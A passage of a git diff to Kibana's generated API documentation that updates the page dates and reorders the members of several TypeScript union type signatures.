b/api_docs/kbn_core_ui_settings_common.mdx index 8c52b4acc359d..27e5f1fb1e5e3 100644 --- a/api_docs/kbn_core_ui_settings_common.mdx +++ b/api_docs/kbn_core_ui_settings_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-ui-settings-common title: "@kbn/core-ui-settings-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-ui-settings-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-ui-settings-common'] --- import kbnCoreUiSettingsCommonObj from './kbn_core_ui_settings_common.devdocs.json'; diff --git a/api_docs/kbn_crypto.mdx b/api_docs/kbn_crypto.mdx index 80c0b181d61fd..3a7f76deb43ab 100644 --- a/api_docs/kbn_crypto.mdx +++ b/api_docs/kbn_crypto.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-crypto title: "@kbn/crypto" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/crypto plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/crypto'] --- import kbnCryptoObj from './kbn_crypto.devdocs.json'; diff --git a/api_docs/kbn_crypto_browser.mdx b/api_docs/kbn_crypto_browser.mdx index 25cb4e2152dc1..64984b67c9293 100644 --- a/api_docs/kbn_crypto_browser.mdx +++ b/api_docs/kbn_crypto_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-crypto-browser title: "@kbn/crypto-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/crypto-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/crypto-browser'] --- import kbnCryptoBrowserObj from './kbn_crypto_browser.devdocs.json'; diff --git a/api_docs/kbn_datemath.devdocs.json b/api_docs/kbn_datemath.devdocs.json index fc0a5027ecb5b..d3d0d4282c053 100644 --- a/api_docs/kbn_datemath.devdocs.json +++ b/api_docs/kbn_datemath.devdocs.json @@ -105,7 +105,7 @@ "label": "Unit", "description": [], "signature": [ - "\"d\" | \"y\" | \"s\" | \"m\" | \"M\" | \"w\" | \"h\" | \"ms\"" + "\"y\" | \"M\" | \"w\" | \"d\" | \"h\" | \"m\" | \"s\" | \"ms\"" ], "path": "packages/kbn-datemath/src/index.ts", "deprecated": false, @@ -182,7 +182,7 @@ "label": "UnitsMap", "description": [], "signature": [ - "{ d: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; y: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; s: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; m: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; M: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; w: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; h: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; ms: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; }" + "{ y: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; M: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; w: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; d: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; h: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; m: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; s: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; ms: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; }" ], "path": "packages/kbn-datemath/src/index.ts", "deprecated": false, diff --git a/api_docs/kbn_datemath.mdx b/api_docs/kbn_datemath.mdx index a6c12ab580409..d440fa059f629 100644 --- a/api_docs/kbn_datemath.mdx +++ b/api_docs/kbn_datemath.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-datemath title: "@kbn/datemath" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/datemath plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/datemath'] --- import kbnDatemathObj from './kbn_datemath.devdocs.json'; diff --git a/api_docs/kbn_dev_cli_errors.mdx b/api_docs/kbn_dev_cli_errors.mdx index 896528891e8a1..61e2d2a39ca14 100644 --- a/api_docs/kbn_dev_cli_errors.mdx +++ b/api_docs/kbn_dev_cli_errors.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-dev-cli-errors title: "@kbn/dev-cli-errors" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/dev-cli-errors plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/dev-cli-errors'] --- import kbnDevCliErrorsObj from './kbn_dev_cli_errors.devdocs.json'; diff --git a/api_docs/kbn_dev_cli_runner.devdocs.json b/api_docs/kbn_dev_cli_runner.devdocs.json index f3523e04e5a20..cb449481aaf1b 100644 --- a/api_docs/kbn_dev_cli_runner.devdocs.json +++ b/api_docs/kbn_dev_cli_runner.devdocs.json @@ -885,7 +885,7 @@ "label": "log", "description": [], "signature": [ - "{ defaultLevel?: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; } | undefined" + "{ defaultLevel?: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; } | undefined" ], "path": "packages/kbn-dev-cli-runner/src/run.ts", "deprecated": false @@ -941,7 +941,7 @@ "label": "log", "description": [], "signature": [ - "{ defaultLevel?: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; } | undefined" + "{ defaultLevel?: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; } | undefined" ], "path": "packages/kbn-dev-cli-runner/src/run_with_commands.ts", "deprecated": false diff --git a/api_docs/kbn_dev_cli_runner.mdx b/api_docs/kbn_dev_cli_runner.mdx index 5df1cd8a51612..83964a3198a1b 100644 --- a/api_docs/kbn_dev_cli_runner.mdx +++ b/api_docs/kbn_dev_cli_runner.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-dev-cli-runner title: "@kbn/dev-cli-runner" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/dev-cli-runner plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/dev-cli-runner'] --- import kbnDevCliRunnerObj from './kbn_dev_cli_runner.devdocs.json'; diff --git a/api_docs/kbn_dev_proc_runner.mdx b/api_docs/kbn_dev_proc_runner.mdx index 2003db4ad3276..d7e0b852a94e7 100644 --- a/api_docs/kbn_dev_proc_runner.mdx +++ b/api_docs/kbn_dev_proc_runner.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-dev-proc-runner title: "@kbn/dev-proc-runner" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/dev-proc-runner plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/dev-proc-runner'] --- import kbnDevProcRunnerObj from './kbn_dev_proc_runner.devdocs.json'; diff --git a/api_docs/kbn_dev_utils.mdx b/api_docs/kbn_dev_utils.mdx index 699666ff37139..4f7a4a332b0d9 100644 --- a/api_docs/kbn_dev_utils.mdx +++ b/api_docs/kbn_dev_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-dev-utils title: "@kbn/dev-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/dev-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/dev-utils'] --- import kbnDevUtilsObj from './kbn_dev_utils.devdocs.json'; diff --git a/api_docs/kbn_doc_links.mdx b/api_docs/kbn_doc_links.mdx index e774fabd77582..cdb41ca37fa3f 100644 --- a/api_docs/kbn_doc_links.mdx +++ b/api_docs/kbn_doc_links.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-doc-links title: "@kbn/doc-links" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/doc-links plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/doc-links'] --- import kbnDocLinksObj from './kbn_doc_links.devdocs.json'; diff --git a/api_docs/kbn_docs_utils.mdx b/api_docs/kbn_docs_utils.mdx index 152b82990a57c..f40ce355eaf4b 100644 --- a/api_docs/kbn_docs_utils.mdx +++ b/api_docs/kbn_docs_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-docs-utils title: "@kbn/docs-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/docs-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/docs-utils'] --- import kbnDocsUtilsObj from './kbn_docs_utils.devdocs.json'; diff --git a/api_docs/kbn_ebt_tools.mdx b/api_docs/kbn_ebt_tools.mdx index 6385eca388c06..3171efaf3386e 100644 --- a/api_docs/kbn_ebt_tools.mdx +++ b/api_docs/kbn_ebt_tools.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ebt-tools title: "@kbn/ebt-tools" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ebt-tools plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ebt-tools'] --- import kbnEbtToolsObj from './kbn_ebt_tools.devdocs.json'; diff --git a/api_docs/kbn_es_archiver.mdx b/api_docs/kbn_es_archiver.mdx index c0b8b95afd076..b5d4f9edc5655 100644 --- a/api_docs/kbn_es_archiver.mdx +++ b/api_docs/kbn_es_archiver.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-es-archiver title: "@kbn/es-archiver" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/es-archiver plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/es-archiver'] --- import kbnEsArchiverObj from './kbn_es_archiver.devdocs.json'; diff --git a/api_docs/kbn_es_errors.mdx b/api_docs/kbn_es_errors.mdx index d6dffdc4522a5..e6b40c8df7943 100644 --- a/api_docs/kbn_es_errors.mdx +++ b/api_docs/kbn_es_errors.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-es-errors title: "@kbn/es-errors" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/es-errors plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/es-errors'] --- import kbnEsErrorsObj from './kbn_es_errors.devdocs.json'; diff --git a/api_docs/kbn_es_query.devdocs.json b/api_docs/kbn_es_query.devdocs.json index d7a24b8740064..f238caaf35698 100644 --- a/api_docs/kbn_es_query.devdocs.json +++ b/api_docs/kbn_es_query.devdocs.json @@ -3690,7 +3690,7 @@ "label": "function", "description": [], "signature": [ - "\"nested\" | \"exists\" | \"range\" | \"is\" | \"and\" | \"or\" | \"not\"" + "\"range\" | \"nested\" | \"exists\" | \"is\" | \"and\" | \"or\" | \"not\"" ], "path": "packages/kbn-es-query/src/kuery/node_types/types.ts", "deprecated": false diff --git a/api_docs/kbn_es_query.mdx b/api_docs/kbn_es_query.mdx index bada979dd795a..2dd45f6fddb1c 100644 --- a/api_docs/kbn_es_query.mdx +++ b/api_docs/kbn_es_query.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-es-query title: "@kbn/es-query" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/es-query plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/es-query'] --- import kbnEsQueryObj from './kbn_es_query.devdocs.json'; diff --git a/api_docs/kbn_eslint_plugin_imports.mdx b/api_docs/kbn_eslint_plugin_imports.mdx index 59633ea783a60..aa4ca7533f06f 100644 --- a/api_docs/kbn_eslint_plugin_imports.mdx +++ b/api_docs/kbn_eslint_plugin_imports.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-eslint-plugin-imports title: "@kbn/eslint-plugin-imports" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/eslint-plugin-imports plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/eslint-plugin-imports'] --- import kbnEslintPluginImportsObj from './kbn_eslint_plugin_imports.devdocs.json'; diff --git a/api_docs/kbn_field_types.mdx b/api_docs/kbn_field_types.mdx index f697d734f9307..57ca434933edd 100644 --- a/api_docs/kbn_field_types.mdx +++ b/api_docs/kbn_field_types.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-field-types title: "@kbn/field-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/field-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/field-types'] --- import kbnFieldTypesObj from './kbn_field_types.devdocs.json'; diff --git a/api_docs/kbn_find_used_node_modules.mdx b/api_docs/kbn_find_used_node_modules.mdx index a52f7e08c18ac..5ea870d5ea6b9 100644 --- a/api_docs/kbn_find_used_node_modules.mdx +++ b/api_docs/kbn_find_used_node_modules.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-find-used-node-modules title: "@kbn/find-used-node-modules" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/find-used-node-modules plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/find-used-node-modules'] --- import kbnFindUsedNodeModulesObj from './kbn_find_used_node_modules.devdocs.json'; diff --git a/api_docs/kbn_generate.mdx b/api_docs/kbn_generate.mdx index 2628105136a99..a7011b1b2bd0e 100644 --- a/api_docs/kbn_generate.mdx +++ b/api_docs/kbn_generate.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-generate title: "@kbn/generate" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/generate plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/generate'] --- import kbnGenerateObj from './kbn_generate.devdocs.json'; diff --git a/api_docs/kbn_get_repo_files.mdx b/api_docs/kbn_get_repo_files.mdx index 82a5586e751f7..51b8b7608822d 100644 --- a/api_docs/kbn_get_repo_files.mdx +++ b/api_docs/kbn_get_repo_files.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-get-repo-files title: "@kbn/get-repo-files" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/get-repo-files plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/get-repo-files'] --- import kbnGetRepoFilesObj from './kbn_get_repo_files.devdocs.json'; diff --git a/api_docs/kbn_handlebars.mdx b/api_docs/kbn_handlebars.mdx index a69deb4635b6a..e559a355ec49e 100644 --- a/api_docs/kbn_handlebars.mdx +++ b/api_docs/kbn_handlebars.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-handlebars title: "@kbn/handlebars" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/handlebars plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/handlebars'] --- import kbnHandlebarsObj from './kbn_handlebars.devdocs.json'; diff --git a/api_docs/kbn_hapi_mocks.mdx b/api_docs/kbn_hapi_mocks.mdx index c383b8ddebba0..d88b2684492ec 100644 --- a/api_docs/kbn_hapi_mocks.mdx +++ b/api_docs/kbn_hapi_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-hapi-mocks title: "@kbn/hapi-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/hapi-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/hapi-mocks'] --- import kbnHapiMocksObj from './kbn_hapi_mocks.devdocs.json'; diff --git a/api_docs/kbn_home_sample_data_card.devdocs.json b/api_docs/kbn_home_sample_data_card.devdocs.json index 4297b7ded9eb5..1806b7c0a813f 100644 --- a/api_docs/kbn_home_sample_data_card.devdocs.json +++ b/api_docs/kbn_home_sample_data_card.devdocs.json @@ -602,7 +602,7 @@ "\nParameters drawn from the Storybook arguments collection that customize a component story." ], "signature": [ - "{ status: any; name: any; description: any; includeAppLinks: any; simulateErrors: any; }" + "{ status: any; description: any; name: any; includeAppLinks: any; simulateErrors: any; }" ], "path": "packages/home/sample_data_card/src/mocks/index.ts", "deprecated": false, diff --git a/api_docs/kbn_home_sample_data_card.mdx b/api_docs/kbn_home_sample_data_card.mdx index d515fa8af7c93..d335f7dca6d4e 100644 --- a/api_docs/kbn_home_sample_data_card.mdx +++ b/api_docs/kbn_home_sample_data_card.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-home-sample-data-card title: "@kbn/home-sample-data-card" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/home-sample-data-card plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/home-sample-data-card'] --- import kbnHomeSampleDataCardObj from './kbn_home_sample_data_card.devdocs.json'; diff --git a/api_docs/kbn_home_sample_data_tab.mdx b/api_docs/kbn_home_sample_data_tab.mdx index f07c442fcea92..30e0c682aff67 100644 --- a/api_docs/kbn_home_sample_data_tab.mdx +++ b/api_docs/kbn_home_sample_data_tab.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-home-sample-data-tab title: "@kbn/home-sample-data-tab" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/home-sample-data-tab plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/home-sample-data-tab'] --- import kbnHomeSampleDataTabObj from './kbn_home_sample_data_tab.devdocs.json'; diff --git a/api_docs/kbn_i18n.mdx b/api_docs/kbn_i18n.mdx index ca37a9efbfabd..fffaec03f91ef 100644 --- a/api_docs/kbn_i18n.mdx +++ b/api_docs/kbn_i18n.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-i18n title: "@kbn/i18n" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/i18n plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/i18n'] --- import kbnI18nObj from './kbn_i18n.devdocs.json'; diff --git a/api_docs/kbn_import_resolver.mdx b/api_docs/kbn_import_resolver.mdx index f89c33e4c6576..6d5c522639253 100644 --- a/api_docs/kbn_import_resolver.mdx +++ b/api_docs/kbn_import_resolver.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-import-resolver title: "@kbn/import-resolver" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/import-resolver plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/import-resolver'] --- import kbnImportResolverObj from './kbn_import_resolver.devdocs.json'; diff --git a/api_docs/kbn_interpreter.mdx b/api_docs/kbn_interpreter.mdx index 527cc0829964e..cc744bff457b9 100644 --- a/api_docs/kbn_interpreter.mdx +++ b/api_docs/kbn_interpreter.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-interpreter title: "@kbn/interpreter" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/interpreter plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/interpreter'] --- import kbnInterpreterObj from './kbn_interpreter.devdocs.json'; diff --git a/api_docs/kbn_io_ts_utils.mdx b/api_docs/kbn_io_ts_utils.mdx index 677d30c9bede2..ed7b7b135bb30 100644 --- a/api_docs/kbn_io_ts_utils.mdx +++ b/api_docs/kbn_io_ts_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-io-ts-utils title: "@kbn/io-ts-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/io-ts-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/io-ts-utils'] --- import kbnIoTsUtilsObj from './kbn_io_ts_utils.devdocs.json'; diff --git a/api_docs/kbn_jest_serializers.mdx b/api_docs/kbn_jest_serializers.mdx index 9d7dbe4bfd469..587f242ef3ff8 100644 --- a/api_docs/kbn_jest_serializers.mdx +++ b/api_docs/kbn_jest_serializers.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-jest-serializers title: "@kbn/jest-serializers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/jest-serializers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/jest-serializers'] --- import kbnJestSerializersObj from './kbn_jest_serializers.devdocs.json'; diff --git a/api_docs/kbn_kibana_manifest_parser.mdx b/api_docs/kbn_kibana_manifest_parser.mdx index 7f32ca6fb45e0..df3611890de4c 100644 --- a/api_docs/kbn_kibana_manifest_parser.mdx +++ b/api_docs/kbn_kibana_manifest_parser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-kibana-manifest-parser title: "@kbn/kibana-manifest-parser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/kibana-manifest-parser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/kibana-manifest-parser'] --- import kbnKibanaManifestParserObj from './kbn_kibana_manifest_parser.devdocs.json'; diff --git a/api_docs/kbn_kibana_manifest_schema.mdx b/api_docs/kbn_kibana_manifest_schema.mdx index 656ac70c54de7..886b3d014e938 100644 --- a/api_docs/kbn_kibana_manifest_schema.mdx +++ b/api_docs/kbn_kibana_manifest_schema.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-kibana-manifest-schema title: "@kbn/kibana-manifest-schema" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/kibana-manifest-schema plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/kibana-manifest-schema'] --- import kbnKibanaManifestSchemaObj from './kbn_kibana_manifest_schema.devdocs.json'; diff --git a/api_docs/kbn_logging.devdocs.json b/api_docs/kbn_logging.devdocs.json index 48fbab71d99a6..33bcbcb329f08 100644 --- a/api_docs/kbn_logging.devdocs.json +++ b/api_docs/kbn_logging.devdocs.json @@ -618,7 +618,7 @@ "label": "EcsEventCategory", "description": [], "signature": [ - "\"database\" | \"email\" | \"package\" | \"network\" | \"web\" | \"file\" | \"host\" | \"session\" | \"registry\" | \"process\" | \"authentication\" | \"configuration\" | \"driver\" | \"iam\" | \"intrusion_detection\" | \"malware\"" + "\"host\" | \"database\" | \"email\" | \"package\" | \"network\" | \"web\" | \"file\" | \"session\" | \"registry\" | \"process\" | \"authentication\" | \"configuration\" | \"driver\" | \"iam\" | \"intrusion_detection\" | \"malware\"" ], "path": "packages/kbn-logging/src/ecs/event.ts", "deprecated": false, @@ -660,7 +660,7 @@ "label": "EcsEventType", "description": [], "signature": [ - "\"start\" | \"error\" | \"end\" | \"group\" | \"user\" | \"info\" | \"admin\" | \"protocol\" | \"connection\" | \"access\" | \"allowed\" | \"change\" | \"creation\" | \"deletion\" | \"denied\" | \"installation\"" + "\"start\" | \"error\" | \"connection\" | \"user\" | \"info\" | \"group\" | \"end\" | \"admin\" | \"protocol\" | \"access\" | \"allowed\" | \"change\" | \"creation\" | \"deletion\" | \"denied\" | \"installation\"" ], "path": "packages/kbn-logging/src/ecs/event.ts", "deprecated": false, diff --git a/api_docs/kbn_logging.mdx b/api_docs/kbn_logging.mdx index 25e4ad79bcab6..46e541c754317 100644 --- a/api_docs/kbn_logging.mdx +++ b/api_docs/kbn_logging.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-logging title: "@kbn/logging" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/logging plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/logging'] --- import kbnLoggingObj from './kbn_logging.devdocs.json'; diff --git a/api_docs/kbn_logging_mocks.mdx b/api_docs/kbn_logging_mocks.mdx index 9bd617715fb7e..1d6bb68071c1f 100644 --- a/api_docs/kbn_logging_mocks.mdx +++ b/api_docs/kbn_logging_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-logging-mocks title: "@kbn/logging-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/logging-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/logging-mocks'] --- import kbnLoggingMocksObj from './kbn_logging_mocks.devdocs.json'; diff --git a/api_docs/kbn_managed_vscode_config.mdx b/api_docs/kbn_managed_vscode_config.mdx index ccbfebd0158ff..cd050763491cc 100644 --- a/api_docs/kbn_managed_vscode_config.mdx +++ b/api_docs/kbn_managed_vscode_config.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-managed-vscode-config title: "@kbn/managed-vscode-config" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/managed-vscode-config plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/managed-vscode-config'] --- import kbnManagedVscodeConfigObj from './kbn_managed_vscode_config.devdocs.json'; diff --git a/api_docs/kbn_mapbox_gl.devdocs.json b/api_docs/kbn_mapbox_gl.devdocs.json index be7808b1047d2..c620f401dd1fe 100644 --- a/api_docs/kbn_mapbox_gl.devdocs.json +++ b/api_docs/kbn_mapbox_gl.devdocs.json @@ -8105,7 +8105,7 @@ "label": "MapEvent", "description": [], "signature": [ - "\"error\" | \"rotate\" | \"move\" | \"render\" | \"data\" | \"remove\" | \"idle\" | \"resize\" | \"zoom\" | \"mousedown\" | \"mouseup\" | \"mouseover\" | \"mousemove\" | \"click\" | \"dblclick\" | \"mouseenter\" | \"mouseleave\" | \"mouseout\" | \"contextmenu\" | \"wheel\" | \"touchstart\" | \"touchend\" | \"touchmove\" | \"touchcancel\" | \"movestart\" | \"moveend\" | \"dragstart\" | \"drag\" | \"dragend\" | \"zoomstart\" | \"zoomend\" | \"rotatestart\" | \"rotateend\" | \"pitchstart\" | \"pitch\" | \"pitchend\" | \"boxzoomstart\" | \"boxzoomend\" | \"boxzoomcancel\" | \"webglcontextlost\" | \"webglcontextrestored\" | \"load\" | \"styledata\" | \"sourcedata\" | \"dataloading\" | \"styledataloading\" | \"sourcedataloading\" | \"styleimagemissing\" | \"style.load\" | \"dataabort\" | \"sourcedataabort\"" + "\"error\" | \"render\" | \"data\" | \"remove\" | \"rotate\" | \"move\" | \"idle\" | \"resize\" | \"zoom\" | \"mousedown\" | \"mouseup\" | \"mouseover\" | \"mousemove\" | \"click\" | \"dblclick\" | \"mouseenter\" | \"mouseleave\" | \"mouseout\" | \"contextmenu\" | \"wheel\" | \"touchstart\" | \"touchend\" | \"touchmove\" | \"touchcancel\" | \"movestart\" | \"moveend\" | \"dragstart\" | \"drag\" | \"dragend\" | \"zoomstart\" | \"zoomend\" | \"rotatestart\" | \"rotateend\" | \"pitchstart\" | \"pitch\" | \"pitchend\" | \"boxzoomstart\" | \"boxzoomend\" | \"boxzoomcancel\" | \"webglcontextlost\" | \"webglcontextrestored\" | \"load\" | \"styledata\" | \"sourcedata\" | \"dataloading\" | \"styledataloading\" | \"sourcedataloading\" | \"styleimagemissing\" | \"style.load\" | \"dataabort\" | \"sourcedataabort\"" ], "path": "node_modules/maplibre-gl/dist/maplibre-gl.d.ts", "deprecated": false, diff --git a/api_docs/kbn_mapbox_gl.mdx b/api_docs/kbn_mapbox_gl.mdx index 56fe06d95dc59..17949f9985e64 100644 --- a/api_docs/kbn_mapbox_gl.mdx +++ b/api_docs/kbn_mapbox_gl.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-mapbox-gl title: "@kbn/mapbox-gl" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/mapbox-gl plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/mapbox-gl'] --- import kbnMapboxGlObj from './kbn_mapbox_gl.devdocs.json'; diff --git a/api_docs/kbn_ml_agg_utils.mdx b/api_docs/kbn_ml_agg_utils.mdx index ac9fdbecd6a53..e743430e9222d 100644 --- a/api_docs/kbn_ml_agg_utils.mdx +++ b/api_docs/kbn_ml_agg_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ml-agg-utils title: "@kbn/ml-agg-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ml-agg-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ml-agg-utils'] --- import kbnMlAggUtilsObj from './kbn_ml_agg_utils.devdocs.json'; diff --git a/api_docs/kbn_ml_is_populated_object.mdx b/api_docs/kbn_ml_is_populated_object.mdx index 995bec325211d..3a0dfce55f800 100644 --- 